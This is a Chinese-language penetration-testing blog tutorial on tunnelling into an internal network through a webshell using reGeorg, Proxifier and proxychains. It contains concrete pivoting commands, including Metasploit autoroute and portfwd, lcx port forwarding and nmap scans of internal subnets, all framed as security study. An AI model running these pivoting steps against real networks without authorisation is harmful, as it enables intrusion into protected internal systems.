复制代码

3.内网渗透之reGeorg+Proxifier

本文旨在学习内网渗透代理工具reGeorg+Proxifier工具的使用和利用。

工具介绍:

reGeorg是reDuh的继承者,利用了会话层的socks5协议,而Proxifier是一款强大的socks5客户端,可以让不支持通过代理服务器工作的网络能通过HTTPS或SOCKS代理或代理链。该文件下支持php,asp,jsp,aspx。

内网转发工具大体分为:端口转发工具(lcx.exe),Web代理脚本,Shell反弹脚本等。

reGeorg的出现,方便了安全测试代理进入内网,现在使用reGeorg和Proxifier,在安全测试过程中,可以利用他们的组合完成从外网到内网的通信。

模拟的reGeorg转发视图:

正向代理和反向代理:

1.正向代理:正向代理类似一个跳板机,代理访问内部资源。

举个例子:我是一个用户,我访问不了某网站,但是我能访问一个代理服务器,这个代理服务器能访问那个我不能访问的网站,于是我先连上代理服务器,告诉他我需要那个无法访问网站的内容,代理服务器去取回来,然后返回给我。从网站的角度,只在代理服务器来取内容的时候有一次记录,有时候并不知道是用户的请求,也隐藏了用户的资料,这取决于代理告不告诉网站。

客户端必须设置正向代理服务器,前提是要知道正向代理服务器的IP地址,还有代理程序的端口。

总结:正向代理是一个位于客户端和原始服务器(origin server)之间的服务器,为了从原始服务器取得内容,客户端向代理发送一个请求并指定目标(原始服务器),然后代理向原始服务器转交请求并将获得的内容返回给客户端。客户端必须要进行一些特别的设置才能使用正向代理。

正向代理用途:

(1) 访问原来无法访问的资源,如Google,youtube

(2) 可以做缓存,加速访问资源。

(3) 对客户端访问授权,上网进行认证。

(4) 记录用户访问记录,管理上网行为,对外隐藏用户信息。

---------------------------------------------------------------

2.反向代理:

反向代理(Reverse Proxy)实际运行方式是指以代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给internet上请求连接的客户端,此时代理服务器对外就表现为一个服务器。

反向代理作用:

(1) 保证内网的安全,可以使用反向代理提供WAF功能,阻止web攻击大型网站,通常将反向代理作为公网访问地址,Web服务器是内网。

 

(2) 负载均衡,通过反向代理服务器来优化网站的负载

-------------------------------------------------------

即是正向代理隐藏的是客户端,反向代理隐藏的是服务器端

内网渗透代理工具reGeorg+Proxifier工具利用场景:

目标环境:linux服务器受到防火墙的限制,防火墙DMZ区域映射外网端口80,外网只能通过80端口访问内网,内网只能返回http的流量,无法采用反向代理的形式。利用常规的lcx等反弹工具也会被各种安全软件拦截,只要一枚权限较低的webshell,尝试提权无果。

为什么需要内网穿透:一般来说,linux提权需要获取一个反弹回来的半交互式shell,内网穿透可以用来进一步内网渗透。

如何进行内网穿透:

(1) 反向代理:将内网的流量转发到外网

(2) 正向代理:以某台机器为跳板,做正向代理进行内网穿透

这里很明显,我们只能通过80端口访问目标机器。因此需要借助webshell搭建一个正向代理。

这个时候就需要一款内网代理和端口转发工具,穿越防火墙的阻挡直连内网

内网渗透代理工具reGeorg+Proxifier搭建与使用:

0x01 下载和配置reGeorg

由于reGeorg是用python2脚本编写,需要urllib3模块。

给出reGeorg的github下载地址:https://github.com/sensepost/reGeorg

使用reGeorg需要安装setuptools。

windows下载地址:https://pypi.org/project/setuptools/#windows-simplified

linux下载地址:https://bootstrap.pypa.io/ez_setup.py

下载完成后将setuptools复制到python2.7版本安装目录下,打开cmd,依次运行:

py -2 setup.py build
py -2 setup.py install

使用pip直接安装urllib3:

py -2 -m pip install urllib3

至此reGeorg的基本使用环境已经配置完成...

验证reGeorg是否可以正常运行:

成功。至此reGeorg安装完成。

0x02 reGeorg的使用

将reGeorg对应的脚本上传到服务器端,reGeorg提供了php,aspx,jsp脚本

直接访问上传的脚本文件,出现 Georg says, 'All seems fine' ,表示脚本运行正常。

运行reGerog监听9999端口:

py -2 reGeorgSocksProxy.py -p 9999 -u http://47.107.136.25/tunnel.nosocket.php

由于是基于socks5,本地还需要一个socks5代理工具,比如proxifier,proxycap...这里用proxifier为例,首先对proxifier进行配置。

proxifier注意事项:

1.direct表示不使用socks5代理,直接请求;block表示阻断请求;proxy socks5表示使用socks5代理服务。

2.默认不使用proxy socks5,仅对需要的程序使用socks5代理服务。

配置完成后,访问内网地址:

 

以上是windows,下面介绍在Linux中使用reGerog+proxychains。

proxychains是kali里面自带的,这里也给出github地址:https://github.com/haad/proxychains

不过对于reGerog的安装参照windows安装方法,setuptools也需要安装,安装完毕上传tunnel.nosocket.php脚本,尝试建立socks5代理链接:

proxychains安装完毕后需要修改 /etc/proxychains.conf 最后一行:

至此,利用proxychains进行socks5代理完成

通过建立sock5隧道,这样本地的kaliweb服务器处于同一个环境。

使用方法:

proxychains <运行的命令> <命令参数>

只要在需要代理的命令前面加上proxychains即可
eg:proxychains firefox 可以使用firefox浏览器远程访问内网服务器
proxychains nmap -T4 -A 10.8.0.0/24 扫描内网开放端口

关于proxychains的实战利用请看:https://www.cnblogs.com/adislj777/p/6980365.html

不过这样比较慢,现在一般使用msf+proxychains,不过前提是我们获取了一个弹回来的shell,有了shell以后,

就进行内网代理:

run get_local_subnets 查看目标主机路由信息
run autoroute -s 192.168.100.0/22 添加路由(在 -s 前加-d是删除路由)

设置好之后就使用socks5辅助模块

再配置proxychains.conf 末尾修改成socks5 127.0.0.1 9999就大功告成了,

扫描内网端口:

proxychains nmap -sT -Pn –open 192.168.100.1/22

注意:由于proxychains无法代理icmp的数据包 所以必须添加-Pn参数 即不检测主机是否存活 直接进行端口tcp扫描

补充:

其实也可以直接使用msf的辅助模块进行扫描

auxiliary/scanner/portscan  端口扫描
scanner/portscan/syn  SYN端口扫描
scanner/portscan/tcp  TCP端口扫描

对端口转发的补充

meterpreter也可以实现端口转发

meterpreter > portfwd add -l 55555 -r 192.168.16.1 -p 3306

lcx端口转发

攻击机
lcx -listen 2222 3333 # 2222为转发端口,3333为本机任意未被占用的端口
目标主机
lcx -slave 110.1.1.1 2222 127.0.0.1 3389

另外还有很多使用socks进行内网漫游的方法,这里不在一一细说,具体看大佬博客:

https://www.anquanke.com/post/id/85494

https://blog.csdn.net/Fly_hps/article/details/80634746

 

参考链接:

正向代理与反向代理:https://www.cnblogs.com/Anker/p/6056540.html

https://blog.csdn.net/na_tion/article/details/47728121

https://www.bugbank.cn/pwn/detail/57ae7e13495cda7f77121557.html

https://bbs.ichunqiu.com/thread-12514-1-1.html

https://xz.aliyun.com/t/228

proxychains使用:https://www.freebuf.com/articles/network/159199.html

https://myzxcg.github.io/20180928.html

posted @ 2019-01-01 18:07  bmjoker  阅读(2164)  评论(0编辑  收藏  举报